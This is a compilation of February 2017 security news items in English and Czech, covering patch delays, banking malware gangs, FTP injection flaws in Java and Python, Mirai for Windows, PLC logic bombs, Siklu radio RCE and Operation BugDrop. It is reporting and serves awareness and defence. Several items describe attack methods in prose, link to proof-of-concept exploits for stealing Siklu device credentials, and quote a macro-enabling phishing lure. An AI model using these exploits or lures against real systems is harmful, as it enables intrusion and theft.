Just last week, Microsoft announced that its February patches would be delayed until March due to a last minute issue, a move that led to Google publishing details of an unpatched Windows bug.
However, the software giant emailed a handful of big business to alert them to the incoming patches on Monday, advising them to update their systems as soon as possible.
The security patches are now available to all Windows customers over Windows Update, and "No other security updates are scheduled for release until the next scheduled monthly update release on March 14, 2017," Microsoft says.
Bulletin MS17-005 for Adobe Flash Player addresses remote code execution (RCE) vulnerabilities for some currently supported Windows systems.
The flaws are rated "Critical" for Windows client operating systems to Windows 8.1 and Windows Server 2016, but "Moderate" for Windows Server 2012.
But Microsoft Won't Patch Two Disclosed Flaws Until 14th March
However, two security vulnerabilities, which have already been publicly disclosed with working exploit code, remain still unpatched, giving attackers enough time to target Windows users.
First one is a Windows SMB vulnerability that affects Windows 8, Windows 10 and Windows Server. The proof-of-concept exploit code of this flaw was released just over a week ago.
The other one is the flaw disclosed by Google earlier this week that affects Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10 that had yet to be patched.
Google disclosed the vulnerability, which resides in Windows' Graphics Device Interface (GDI) library, with POC exploit, meaning attackers can exploit the vulnerability before Microsoft issue a patch.
The latest security patches come a week after Microsoft's usual Patch Tuesday.
Since details of the security updates released by Microsoft on Tuesday remain sketchy, what these patches resolve is not currently known.
So if you check for updates on your Windows PC and find one waiting for you, don't be surprised and patch your software immediately to make sure your Flash Player software is secure, though you’ll still be waiting until March 14 for the complete Patch Tuesday fix.
Microsoft Releases Security Update for Flash Player Libraries
22.2.2017 securityweek Vulnerebility
While most of this month’s security updates have been postponed to March 14, Microsoft has decided to release one bulletin to address the Flash Player vulnerabilities fixed by Adobe on Patch Tuesday.
The critical bulletin, MS17-005, resolves 13 vulnerabilities in the Flash Player libraries used by Internet Explorer 10, Internet Explorer 11 and Edge.
The patches, obtainable via Windows Update and the Microsoft Update Catalog, are available for Windows 8, Windows RT 8.1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, and Windows 10.
The Flash Player flaws patched by Adobe this month are memory corruption issues that can be exploited for arbitrary code execution. They were reported to the vendor by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs.
There had been no evidence of exploits in the wild, but apparently Microsoft decided that the flaws are serious enough to warrant the release of an out-of-band update.
There are at least two Windows zero-day vulnerabilities that Microsoft is expected to address next month. One of them is a denial-of-service (DoS) flaw caused by how SMB traffic is handled.
The second one is a medium severity information disclosure issue discovered by Google Project Zero researchers. Google made the details of the security hole public after Microsoft failed to release a patch within 90 days.
Microsoft still hasn’t shared any information on why it had to delay the February patches, only saying that it was a last minute issue. Some have speculated that it could have something to do with cumulative updates or an infrastructure problem.
RTM gang is the cybercrime organization that targets remote banking system
22.2.2017 securityweek CyberCrime
Researchers at ESET are monitoring the activity of a cybercrime group tracked as RTM that focuses its criminal operations on Remote Banking Systems.
Experts at software firm ESET are monitoring the activity of a cybercrime group tracked as RTM that using a sophisticated malware written in Delphi language to target Remote Banking Systems (RBS). The Remote Banking Systems are business software used to make bulk financial transfers.
The Russian CERT FinCERT who is involved in the investigation of cybercrime targeting Russian financial institutions 2016 issued a security advisory.
According to ESET, the RTM gang has been active since 2015 and used a spyware to monitor the victims’machines.
“This group, active since at least 2015, is using malware, written in Delphi, to spy on its victims in a variety of ways, such as monitoring keystrokes and smart cards inserted into the system.” reads the blog post published by ESET.
The malware allows the RTM gang to monitor real-time the banking-related activities of the victims as well as the possibility to exfiltrate data from their PCs.
The malicious code used by the crooks actively searches for export files that are commonly used to a widespread accounting software called “1C: Enterprise 8”, mostly in Russia.
These specific files contain details of bulk transfers and are managed by RBS systems to complete payment orders. Intercepting these files, it is possible to modify them in order to hijack payments.
Researchers at ESET highlighted that the same attack technique was also used by other criminal organizations, such as Buhtrap and Corkow, that have also targeted RBS users in the past, slowly building an understanding of the network and building custom tools to steal from corporate victims.
Both groups used custom tools to target the RBS systems in the past, and the recent operations conducted by the RTM confirm that criminal organizations are looking with interest at this specific hacking activity.
The RTM mainly targeted financial organizations in Russia and in neighbor countries, but the experts warn that other groups using similar tactics are operating in Western Europe.
ESET published a white paper detailing the activities of the RTM gang, enjoy it!
Finanční sektor zasáhla série útoků, hackeři matou vyšetřovatele
22.2.2017 SecurityWorld Hacking
V posledních měsících se na finanční organizace z celého světa svalila vlna organizovaných a sofistikovaných útoků od neznámých hackerů. Nejnovější poznatky vyšetřovatelů ukazují, že v malwaru rozesílaném po bankách jsou záměrně vložena ruská slova, která mají vyšetřovatele svést na špatnou stopu.
Výzkumníci z firmy BAE Systems, která se zaměřuje na kybernetickou bezpečnost, nedávno získala a analyzovala vzorky malwaru souvisejícího se sérií útoků. Hackerský malware zasáhl 104 organizací ze 31 zemí, přičemž většinou se jednalo o banky.
V malwaru výzkumníci objevili několik příkazů a textových řetězců v ruštině; jazyk je však natolik zvláštní, že jednotlivé fráze byly zřejmě do ruštiny přeloženy pomocí online překladačů. Výsledný text nedává rodilému ruskému mluvčímu příliš smysl.
„V některých případech pozměnil nepřesný překlad celkový smysl slov,“ píší vědci v příspěvku na blogu. „To silně naznačuje, že pro strůjce útoků není ruština rodný jazyk a tedy, že využití ruských slov je ‚falešným signálem‘.“
Zvláštní chování má zřejmě zmást vyšetřovatele útoků. Některé technické důkazy však nasvědčují, že vzorky malwaru a celkově útoky jako takové lze přiřadit ke skupině v odborných kruzích známé jako Lazarus.
Lazarus je aktivní již minimálně od roku 2009 a je viněn z různých útoků proti vládám a soukromým organizacím po celém světě, od Jižní Korey po USA.
Někteří odborníci se rovněž přiklání k názoru, že za útok na Sony Pictures Entertainment z roku 2014, při kterém unikla některá soukromá data a bylo vyřazeno několik počítačů, může právě Lazarus. FBI a jiné americké zpravodajské agentury pak přímo obvinili také Severní Koreu.
Jméno skupiny Lazarus se skloňuje i ve spojitosti s krádeží 81 milionů dolarů z centrální banky Bangladéše z konce minulého roku. V tomto útoku hackeři využili malware k manipulaci s počítači využívanými bankou k přesunu finančních prostředků skrze síť SWIFT. Pokusili se přesunout 951 milionů celkově, ale některé z transakcí selhaly a část se následně úspěšně podařilo zaslat zpět do banky po detekování útoku.
Dříve v únoru malwarový útok zasáhl několik polských bank, útoky mají pocházet z malwarem nakažené stránky polské finanční správy.
Výzkumníci s BAE Systems a Symantecu útoky v Polsku propojili s větší sérií útoků, které započaly již v říjnu. Podobným způsobem došlo k narušení zabezpečení i v národní bance Mexika a největší státem vlastněné bance Uruguaye.
Software malwaru použitý v útocích nese společné znaky s nástroji dříve připsanými skupině Lazarus.
Ruského původu je hned několik hackerských skupin, které se navíc specializují na banky. Tyto skupiny používají přesně cílený druh phishingu (spear-phishing), aby si nejprve v bankách vytvořily pomyslný vstupní bod, pochopily interní procedury, které banka používá, a až poté začaly krást peníze. Výzkum BAE Systems napovídá, že Lazarus se snaží o to, aby jeho aktivita vykazovala podobné rysy jako ruskojazyčné hackerské skupiny.
Watson jde do kognitivních bezpečnostních center
22.2.2017 SecurityWorld Bezpečnost
IBM Security ohlásila dostupnost kyberbezpečnostního programu Watson (Watson for Cyber Security), první inteligentní technologie v oboru navržené k využití v kognitivních bezpečnostních centrech.
V průběhu minulého roku se program Watson učil jazyk kybernetické bezpečnosti a zpracoval více než milion bezpečnostních dokumentů. Nyní bude bezpečnostním expertům pomáhat analyzovat tisíce výzkumných zpráv psaných přirozeným jazykem, které ještě nikdy před tím nebyly moderním bezpečnostním nástrojům zpřístupněny.
Podle průzkumu IBM bezpečnostní týmy důkladně analyzují v průměru více než 200 tisíc bezpečnostních událostí denně, což vede k více než 20 tisícům promarněných hodin ročně, které jsou vynaloženy na řešení falešných poplachů.
Zavedení kognitivních technologií do bezpečnostních center se ukazuje jako nutné a zásadní pro to, aby bylo možné udržet krok s bezpečnostními událostmi, jejichž počet se má podle předpokladů v příštích pěti letech zdvojnásobit.
Watson for Cyber Security bude integrován do nové platformy kognitivních bezpečnostních center společnosti IBM, kde se moderní kognitivní technologie spojí s bezpečnostními operacemi. Bude tak možné reagovat na hrozby cílené na koncové uživatele, sítě a cloud.
Jádrem této platformy je nástroj IBM QRadar Advisor with Watson, nová aplikace, která je dostupná na platformě IBM Security App Exchange, a která jako první využívá kyberbezpečnostní údaje programu Watson.
Tuto novou aplikaci již využívají například Avnet, univerzita v New Brunswick, Sogeti, Sopra Steria a 40 dalších zákazníků po celém světě s cílem zvýšit objem vyšetřovaných bezpečnostních událostí vedených jejich bezpečnostními analytiky.
Kvůli dramatickému nárůstu bezpečnostních incidentů společnost IBM také investovala do výzkumu zaměřeného na zavedení kognitivních nástrojů do celosvětové sítě ovládacího centra IBM X-Force. Součástí výzkumu je i chatbot řízený programem Watson, který se v současné době používá ke komunikaci se zákazníky IBM Managed Security Services.
IBM rovněž představila nový výzkumný projekt s krycím názvem Havyn. Jde o svého druhu ojedinělého bezpečnostního pomocníka ovládaného hlasem, který využívá konverzační technologii programu Watson a reaguje na verbální příkazy a přirozený jazyk bezpečnostních analytiků.
Unpatched Python and Java Flaws Let Hackers Bypass Firewall Using FTP Injection
21.2.2017 thehackernews Vulnerebility
This newly discovered bugs in Java and Python is a big deal today.
The two popular programming languages, Java and Python, contain similar security flaws that can be exploited to send unauthorized emails and bypass any firewall defenses.
And since both the flaws remain unpatched, hackers can take advantage to design potential cyber attack operations against critical networks and infrastructures.
The unpatched flaws actually reside in the way Java and Python programming languages handle File Transfer Protocol (FTP) links, where they don't syntax-check the username parameter, which leads to, what researchers call, protocol injection flaw.
Java/Python FTP Injection to Send Unauthorized SMTP Emails
In a blog post published over the past week, security researcher Alexander Klink detailed the FTP protocol injection vulnerability in Java's XML eXternal Entity (XXE) that allows attackers to inject non-FTP malicious commands inside an FTP connection request.
To demonstrate the attack, Alexander showed how to send an unauthorized email via SMTP (Simple Mail Transfer Protocol) in an FTP connection attempt, even though the FTP connection failed, as FTP servers does support authentication, but doesn't check for the present of carriage returns (CR) or line feeds (LF) in usernames.
"This attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing," Alexander concluded.
Java/Python FTP Injections Allow to Bypass Firewall
However, two days later in a separate security advisory, security researcher Timothy Morgan from Blindspot Security came forward with his findings, showing more threatening exploitation scenario where the FTP URL handlers in both Java and Python can be used to bypass firewalls.
Morgan said such FTP protocol injection flaw could be used to trick a victim's firewall into accepting TCP connections from the web to the vulnerable host's system on its "high" ports (from 1024 to 65535).
Besides the FTP protocol injection attack, there's reside a decade old security issue in FTP protocol called classic mode FTP – an insecure mechanism of client-server FTP interactions, but many firewall vendors still support it by default.
When a classic mode FTP connection is initiated, the firewall temporarily opens a port – typically between 1024 and 65535 – specified in the PORT command, which introduces security risks.
Using the FTP protocol injection issue in Java and Python, an attacker who knows the targeted host’s internal IP address can start a classic mode FTP connection, which attackers can use for nefarious purposes.
Morgan has determined that an attacker can open up one port in the targeted firewall with only three requests:
Identify the victim's internal IP address – this requires an attacker to "send an URL, see how the client behaves, then try another until the attack is successful."
Determine packet alignment and ensure that the PORT command is injected at the right moment, making the attack work.
Exploit the vulnerability.
Each additional request can be used to open up another TCP port.
Easily Exploitable Protocol Injection Flaw
However, the researcher warned that his exploit could be used for man-in-the-middle (MitM) attacks, server-side request forgery (SSRF), an XEE attack and more – and once bypassed the firewall, desktop hosts can be attacked even if they do not have Java installed.
All an attacker need is to convince victims into accessing a malicious Java or Python applications installed on a server to bypass the entire firewall.
"If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP (Java Network Launch Protocol) file," Morgan said. "These files could contain malicious FTP URLs which trigger this bug."
"Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be entirely successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched)."
According to Morgan, a nearly identical flaw also exists in Python's urllib2 and urllib libraries, although "this injection appears to be limited to attacks via directory names specified in the URL."
Protocol Injection Flaw Is Still Unpatched
Morgan said the FTP protocol injection flaw was reported to the Python team in January 2016 and Oracle in November 2016 by his company, but neither of the two has issued any update to address the issue.
Morgan has developed a proof-of-concept (PoC) exploit but is currently holding back publication of his exploit until Oracle and Python respond to the disclosure and release patches.
The Morgan's exploit has successfully been tested against Palo Alto Networks and Cisco ASA firewalls, though researchers believe many commercial firewalls are also vulnerable to FTP stream injection attacks.
So until patches become available, Morgan suggests users uninstall Java on their desktops and in browsers, as well as disable support for "classic mode" FTP on all firewalls.
Mirai for Windows Built by Experienced Bot Herder: Kaspersky
21.2.2017 securityweek BotNet
The Windows variant of the infamous Mirai Linux botnet is the offspring of a more experienced bot herder, possibly of Chinese origin, Kaspersky Lab security researchers warn.
Recently detailed by Doctor Web, its main functionality is to spread the Mirai botnet to embedded Linux-based devices. The malware also abuses Windows Management Instrumentation (WMI) to execute commands on remote hosts, and targets Microsoft SQL Server and MySQL servers to create admin accounts and abuse their privileges.
In a report published this week, Kaspersky Lab researchers explain that Mirai for Windows is nothing but a malware spreader and that it shouldn’t be considered a new botnet. However, the new threat features code differences when compared to the original Mirai, which emerged in the second half of last year, targeting insecure Internet of Things (IoT) devices.
The spreader, Kaspersky confirms, was designed to brute force a remote telnet connection to spread Mirai to previously unavailable resources. By targeting Windows, the Trojan has access to Internet facing vulnerable SQL servers running on the platform, which can be connected to IP cameras on private networks, as well as to DVRs, media center software, various Raspberry and Banana Pi devices, and other internal devices.
What the Russia-based security firm underlines, however, is that the Windows bot isn’t actually new, and that some of its components date back as far as 2014, while its functionality can be traced “back to public sources at least as early as 2013.” The threat can spread “Mirai bots to embedded Linux systems over a very limited delivery vector,” the security company also says.
However, the Mirai crossover between the Linux and Windows platforms is unfortunate, and the public availability of botnet’s source code is expected to bring “heavy problems to the internet infrastructure for years to come,” Kaspersky says. The company also believes that this Windows Trojan is only a minor start compared to the issues to come.
The Windows spreader was designed to search for and attack hosts based on a specific list, and to spread the Linux Mirai botnet over telnet. It can also drop a downloader onto the compromised systems, which in turn downloads Mirai.
Mirai for Windows, Kaspersky says, is the work of a more experienced developer. Various artefacts, the word choice in strings, and the fact that the malware was compiled on a Chinese system (the host servers are maintained in Taiwan), suggest that this author might be a Chinese speaker. The fact that this Trojan is using code-signing certificates stolen exclusively from Chinese companies appears to support this idea as well.
“The addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability to rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world, and the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the juvenile, stagnating, but destructive Mirai botnet operations of 2016,” Kaspersky notes.
Furthermore, the security company says, this exposes more systems and networks to Mirai, while also demonstrating the slow maturing of Mirai. The bot code has been put together from other projects and previous sources, with most components, techniques, and functionality being several years old. The components are hosted embedded within jpeg comments, a technique used since 2013.
Other interesting characteristics of Mirai for Windows include the blind SQLi (sql injection) and brute forcing techniques, which are compiled from a “Cracker” library meant with the “tasking” of various attacks. Furthermore, the Windows bot’s source was supposedly developed in a modular manner in C++, with its functionality broken out across source libraries. The code signing certificates used by the threat appear to have been stolen from a solar and semiconductor grinding wafer products manufacturer in Northwest China.
Logic Bombs Pose Threat to ICS: Researchers
21.2.2017 securityweek ICS
Ladder logic bombs pose threat to ICS
Logic bombs can pose a significant threat to industrial control systems (ICS), particularly programmable logic controllers (PLCs), researchers warned in a paper published last week.
A logic bomb is a piece of code designed to set off a malicious function when specified conditions are met, such as a time and date, or when data provided by a sensor has a certain value.
It is not unheard of for malware to use logic bombs (e.g. Stuxnet and Shamoon), but experts at IIIT Hyderabad in India and the Singapore University of Technology and Design believe there is not enough research on the threat posed to ICS.
Their research has focused on PLCs and ladder programming, which is used to write software for these devices. That is why this type of threats have been named by the experts “ladder logic bombs.”
PLCs are known to have vulnerabilities and researchers have warned of several potential threats, including worms and stealthy pin control attacks.
In an effort to prevent certain attacks, PLC manufacturers have implemented mechanisms designed to block unauthorized firmware from being uploaded to a device. On the other hand, researchers discovered that there is no authentication or security checks in place to ensure that unauthorized logic updates cannot be delivered to a PLC.
An attacker who has physical access to the targeted PLC – in some configurations attacks can also be conducted over the network – can upload malicious logic to the device and hijack it. The attacker can download and upload logic configurations using specialized software, such as Studio 5000 or ControlLogix from Rockwell Automation.
Related: Learn More at the 2017 Singapore ICS Cyber Security Conference
Researchers believe ladder logic bombs can be very dangerous considering that the attacker needs to access the targeted PLC only once. The “bomb” can then be triggered externally, using a specified input, or it can be triggered internally by a system state, certain instructions or at a preset date and time.
According to experts, ladder logic bombs can be used for a wide range of purposes, including denial-of-service (DoS) attacks, changing the PLC’s behavior, and obtaining data. These attacks have been tested in real-world ICS environments.
In the case of DoS attacks, hackers can add a piece of malicious logic to cause the PLC to stop working, potentially damaging the process it controls. Once triggered, the “bomb” can enter an infinite loop and make the device useless.
Ladder logic bombs can also be leveraged to manipulate data, such as sensor readings, which can be used to cover up other unauthorized activities or cause the device to enter an error state.
Attackers can also secretly log sensitive PLC data by using FIFO buffers and recording data into arrays on the device. These threats can go undetected for an extended period of time by not interfering with the device’s normal operation.
In order to prevent these types of attacks, researchers have proposed both network-based countermeasures and centralized validation of running code, which includes the use of authentication or cryptographic signatures for logic updates.
Logic bombs were also used recently in the simulation of a ransomware attack on industrial systems. Researchers showed how specially designed malware can hijack and potentially cause serious damage to a water treatment plant.
CompTIA Offers New Security Analyst Certification
21.2.2017 securityweek Security
An ISACA survey released during RSA week sought to illustrate the state of cyber security workforce development and its current trends. The results would surprise no-one in the industry: recruiting security talent is hard.
But the ISACA survey makes two particularly interesting statements: firstly, that 70% of enterprises "require a security certification for open cyber security positions"; and secondly, that for 55% of enterprises, "practical hands-on experience is the most important cyber security candidate qualification." Since a candidate cannot get experience without first getting a position, new candidates for open cyber security jobs need as much help with other 'qualifications' as possible.
Today, CompTIA has announced a new security qualification: CSA+. It sits between Security+ (covering essential principles for network security and risk management), and CASP (the CompTIA Advanced Security Practitioner, which certifies critical thinking and judgment across a broad spectrum of security disciplines).
CSA+ focuses on the skills required for the use of threat detection tools, data analysis and the interpretation of results to identify vulnerabilities, threats and risks. It certifies a proficiency in data driven security.
"By placing greater emphasis on data analytics, we get a real-time, holistic view of the behavior of the network, its users and their devices to identify potential vulnerabilities and strengthen them before an intrusion happens,” explained CompTIA's senior director for products, James Stanger.
This is perhaps the most critical area of the overall cyber security skills gap, and one that is growing faster than most. The Bureau of Labor Statistics states, "Employment of information security analysts is projected to grow 18 percent from 2014 to 2024, much faster than the average for all occupations. Demand for information security analysts is expected to be very high, as these analysts will be needed to create innovative solutions to prevent hackers from stealing critical information or causing problems for computer networks."
"Data analytics is key," says Jim Lucari, senior manager of certification at HP Enterprise. "Everybody in technology should have this CSA+. It should be mandatory if you're going to stay in IT over the coming decade." The CSA+ qualification could help potential employers gauge candidates' aptitude and skill level for this critical area.
CSA+ exams are available globally via Pearson VUE Testing centers. However, it is not an entry-level security qualification. Although private individuals could use it as part of a project to get into cyber security, it might better suit career advancement than career entry. "Because of the advanced nature of CompTIA CSA+," Stanger told SecurityWeek, "we recommend that candidates for the certification have a minimum of three to four years of hands-on information security or related experience; and hold CompTIA Network+ and Security+ certifications."
One of the recommendations from the ISACA survey suggests that employers should "Groom employees with tangential skills -- such as application specialists and network specialists -- to move into cyber security positions."
Putting such staff through the CSA+ certification could provide a cost-effective approach to filling the cyber analyst security gap. "We recommend a minimum of five days of intensive 'boot camp' style training," said Sanger; "or a quarter or semester of academic instruction."
TeamSpy Malware Spotted in New Campaign
21.2.2017 securityweek Virus
TeamSpy, the data-stealing malware that was associated with a decade-long cyber-espionage operation several years ago, has resurfaced in a new attack campaign, Heimdal Security researchers warn.
The malware, designed to provide its operators with full access to the compromised machines, was used in an information gathering operation that focused mainly on ordinary people, though some victims were found to be high profile industrial, research, or diplomatic targets. The malware was abusing the legitimate TeamViewer remote access tool for its nefarious operations, researchers discovered.
The newly observed attack relies on social engineering to trick potential victims into installing TeamSpy onto their computers. The malware is being distributed via spam emails that contain a malicious ZIP attachment designed to drop an infected DLL (MSIMG32.dll) on the target machine. Two other files are also downloaded onto the computer: 324.bat and 324.exe.
The same as other TeamViewer-abusing malware, the malicious app leverages DLL hijacking to abuse the legitimate software for its nefarious operations. TeamSpy includes various components of the legitimate program, such as a TeamViewer VPN and a keylogger. Upon installation, it kills a series of Windows processes to install these components and launch them.
Simultaneously, the malware copies logs to a text file and writes all usernames and passwords it can find to it. The file is then sent to the command and control (C&C) server.
The final goal of the attack, however, is to gain complete control of the infected PC and to gather confidential information from it while keeping a low profile to avoid alerting the user. For that, the malware downloads additional components, including the TeamViewer application.
“Given how the TeamSpy infection happens, it is clear that a TeamViewer session started by the attackers will be invisible to the victim. This can lead to numerous forms of abuse against the services that the logged in user runs on his/her computer,” Heimdal Security’s Andra Zaharia notes. What’s more, the attack can circumvent two-factor authentication, she says.
The newly observed payload has a low detection rate at the moment and users are advised to carefully analyze all unwanted emails and to avoid downloading attachments from unknown senders. “Malware can disguise itself in many forms on the web, and all it takes is one click to trigger an infection,” Zaharia concludes.
Corporate email addresses are 6.2x more targeted by phishing
21.2.2017 securityaffairs Phishing
At the RSA security conference in San Francisco, the experts at Google Research explained that Corporate email addresses are privileged targets for hackers.
At the RSA security conference in San Francisco, the experts at the Google Research team at the Google Research team have shared the results of an interesting study on cyber attacks against emails accounts.
Corporate email addresses are 4.3 more likely to receive malicious codes compared to personal accounts, 6.2 times more likely to receive phishing lures, and 0.4 times less likely to receive spam messages.
The Google Research team analyzing more than one billion emails that passed through its Gmail service, the experts discovered that corporate inboxes are a privileged target for threat actors. The result is not surprising because corporate email accounts contain more valuable information for attackers. Cyber criminals can steal information and resell them on the Dark Web, meanwhile, nation-state actors could use them for espionage activities.
Which is the most targeted industry?
This result is very interesting, organizations in the real estate sector were the most targeted with malicious codes, while spam emails proposing products and services mostly targeted companies in entertainment and IT industries.
Organizations in the financial sector are the privileged target of phishing campaigns, the experts at Google believe that phishing attacks will continue to increase in the future.
Anyway, there is a good news for Gmail.users, as announced by Elie Bursztein, the head of Google’s anti-abuse research team, the company is going to implement the SMTP Strict Transport Security to the email service.
The SMTP STS will provide a further security measure to protect Gmail users from man-in-the-middle attacks that leverage on rogue certificates. Google, Microsoft,
“Google, Microsoft, Yahoo and Comcast are expected to adopt the standard this year, a draft of which was submitted to the IETF in March 2016.” wrote ThreatPost.
Unpatched Flaws in Python, Java Allow Firewall Bypass
21.2.2017 securityweek Vulnerebility
Unpatched vulnerabilities related to how Java and Python handle file transfer protocol (FTP) URLs can be exploited for various purposes, including for sending unauthorized emails and bypassing firewalls, researchers warned.
In a blog post published over the weekend, Alexander Klink showed how XML external entity (XXE) and server-side request forgery (SSRF) vulnerabilities can be exploited to send emails via SMTP (Simple Mail Transfer Protocol) commands using specially crafted FTP URLs.
Klink’s attack method relies on Java XML parsers and the expert believes it can be particularly useful for scenarios where the attacker has access to an internal mail server from the system that does the XML parsing. The researcher showed how a specially crafted FTP URL can be used to send emails, including ones with attachments.
However, according to Blindspot Security’s Timothy Morgan, the attack method can be used for more than just sending emails. Furthermore, in addition to Java’s FTP URL handling code, a similar vulnerability affects Python’s urllib and urllib2 libraries.
After seeing Klink’s blog post, Morgan also published an advisory describing his findings. He pointed out that such FTP injections can be used to trick a firewall into accepting TCP connections from the Web to the vulnerable system on a specified port.
When a classic mode FTP connection is initiated, the firewall needs to temporarily open a port – typically between 1024 and 65535 – specified in the PORT command. This has been known to introduce security risks for well over a decade, but many firewall vendors still support classic mode FTP by default.
Using the vulnerability, an attacker who knows the targeted host’s internal IP address can inject a malicious PORT command into the stream and open an arbitrary port. The challenge is to determine the victim’s IP address and ensure that the PORT command is sent at the beginning of a packet.
Morgan has determined that an attacker can open up one port in the targeted firewall with only three requests: one to identify the victim’s internal IP, one to determine packet alignment and ensure that the PORT command is injected at the right moment, and one to actually exploit the vulnerability. Each additional request can be used to open up another TCP port.
There are several methods that can be used to exploit the flaw, including via man-in-the-middle (MitM), SSRF and XXE attacks. The most “startling” attack scenario, according to Morgan, involves JNLP (Java Network Launch Protocol) files.
“If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP file. These files could contain malicious FTP URLs which trigger this bug,” Morgan explained. “Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be fully successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched).”
Python developers were notified about the issue more than one year ago, and Oracle was provided the details of the attack method in November. However, the issue still hasn’t been addressed in either Java or Python.
Morgan has developed a proof-of-concept (PoC) exploit, but it will only be made public after Oracle and Python release patches.
The method has been tested against Palo Alto Networks and Cisco ASA firewalls, but experts believe many commercial firewalls are vulnerable to FTP stream injection attacks.
Until patches become available, attacks can be prevented by uninstalling Java and by disabling classic mode FTP in firewalls.
Siklu fixed a serious RCE vulnerability in the Siklu EtherHaul Radios
21.2.2017 securityaffairs Vulnerebility
The security researcher Ian Ling discovered a serious remote command execution (RCE) flaw in the Siklu EtherHaul Radios devices.
Security expert Ian Ling has discovered a severe remote command execution (RCE) vulnerability in the Siklu’s EtherHaul wireless point-to-point radios.
The flaw could be exploited by remote unauthenticated attackers to execute commands and retrieve sensitive information, including usernames and plaintext passwords from the device.
The Israeli firm Siklu has already released a patch to address the vulnerability in the vast majority of its products that have been sold to mobile operators, service providers, wireless security network operators, governments, and enterprises.
The security expert discovered the flaw while testing a feature in the web interface that could be used by operators to configure one radio from another that has a wireless connection to it.
“Siklu EtherHaul devices (wireless point-to-point radios) have a feature in the web interface that allows you to configure both radios in a pair from either side.” reads the post published by the experts.
Ling noticed that the EtherHaul radios have three ports open, the 22 and 443 for management purposes, and the 555 (its use was not clear).
Further analysis of the port 555 allowed the researchers to discover that the service it exposes requires only a username for the authentication process. This means that a remote attacker can send specially crafted requests that look like sent from another Siklu EtherHaul device in order to execute arbitrary commands on the radio.
“Using another vulnerability I found on the EtherHauls, I was able to log in as root and access a Linux shell. The EtherHauls have a tcpdump binary on them, which allowed me to record a packet capture of all traffic involving port 555 and see exactly what data was being sent between the devices.” continues the analysis.
“Prior to the “mo-info rf” command being sent, the device making the request first “authenticates” by sending the username of whoever is logged in, surrounded by a lot of null bytes:”
The researcher discovered that using specific commands it was possible to retrieve login credentials of the EtherHauls and set a new administrator password.
Ling has published the following proof-of-concept (PoC) code exploits:
Show username and password in plaintext: https://gist.github.com/ianling/c06636fba1b294393f0d3b7df082aa91
Set password to “Abc123123″: https://gist.github.com/ianling/6f4b8c76aa369618e3ae7dd494958762
The vulnerability was reported to Siklu on December 22 and the company issued security updates on February 13.
Last year, Ling has spotted another serious vulnerability in the Siklu EtherHaul radios, a hidden root account that had the same unchangeable password on all devices.
Severe Vulnerability Patched in Siklu Radios
21.2.2017 securityweek Vulnerebility
Researcher Ian Ling has discovered a serious remote command execution (RCE) vulnerability in Siklu’s EtherHaul wireless point-to-point radios. Updates that patch the flaw have been released for a majority of the affected products.
Siklu is a Tel-Aviv, Israel-based company that specializes in millimeter wave wireless connectivity radios. The firm says it has a 30% market share and it has sold thousands of radios worldwide to mobile operators, service providers, wireless security network operators, governments and enterprises.
Ling discovered the vulnerability while analyzing a feature in the web interface that allows users to configure one radio from another that has a wireless connection to it. An analysis showed that EtherHaul radios have three ports open, including TCP port 555, which devices connect to during this process.
An analysis of the traffic on port 555 led the researcher to discover that the service running on this port requires only a username for authentication. This allows an attacker to send specially crafted requests that appear to come from another EtherHaul device and execute arbitrary commands on the radio.
One of the commands can be used to retrieve the device’s username and password in plain text. Another command can be leveraged to set a new administrator password. Ling has published proof-of-concept (PoC) code for both these exploits.
According to the expert, the service running on port 555 can be accessed by anyone over the Internet as it is not protected by a firewall or an access control list (ACL).
The vulnerability was reported to Siklu on December 22 and patches were released on February 13. Updates have been made available for all EtherHaul radios, except for models that have reached end of life.
This is not the first time Ling has identified a serious vulnerability in Siklu EtherHaul radios. Roughly one year ago, he reported finding a hidden root account that had the same unchangeable password on all devices. The account, accessible via the device’s interface and SSH, granted access to the underlying Linux operating system, giving an attacker full control.
Operation BugDrop – Hackers siphoned 600GB taking control of PC microphones
21.2.2017 securityaffairs Cyber
Security firm CyberX uncovered the Operation Bugdrop, a cyber espionage campaign that mostly targeted Ukrainian organizations.
Researchers at Security firm CyberX have discovered a cyber espionage campaign that siphoned more than 600 gigabytes from about 70 targets in several industries, including critical infrastructure and news media.
The list of targets includes:
A company that designs remote monitoring systems for oil and gas pipelines
An international organization that monitors human rights, counter-terrorism, and computer attacks on Ukrainian critical infrastructure
An engineering company that designs electrical substations, gas distribution pipelines, and water supply plants
A scientific research institute
Editors of Ukrainian newspapers
The experts have dubbed this espionage campaign Operation BugDrop because attackers use the PC microphones to bug targets and capture the audio and other sensitive data.
The threat actors used a sophisticated malware to exfiltrate sensitive data, capture screenshots. The attack chain starts with phishing emails using malicious Microsoft Word documents, once the target machine is infected, the malware uploads the stolen audio and data to Dropbox.
To make the phishing email more effective the Word document included a graphic that looked like an official Microsoft notification, it displays the following message:
“Attention! The file was created in a newer version of Microsoft Office programs. You must enable macros to correctly display the contents of a document.”
“Operation BugDrop is a well-organized operation that employs sophisticated malware and appears to be backed by an organization with substantial resources. In particular, the operation requires a massive back-end infrastructure to store, decrypt and analyze several GB per day of unstructured data that is being captured from its targets.” reads the analysis published by CyberX “A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics.”
The vast majority of the targets are located in Ukraine, other countries affected included Saudi Arabia and Austria.
The researchers haven’t found any evidence that links the Operation BugDrop to the string of attacks against the Ukrainian infrastructure that caused the massive power outage in the country.
The attackers behind the BlackEnergy threat also targeted a broad range of industries in Ukraine leveraging on spear-phishing messages with weaponized Microsoft Word documents.
The experts at CyberX also found similarities between the Operation BugDrop and the cyber espionage campaign tracked as Operation Groundbait that was discovered in May 2016.
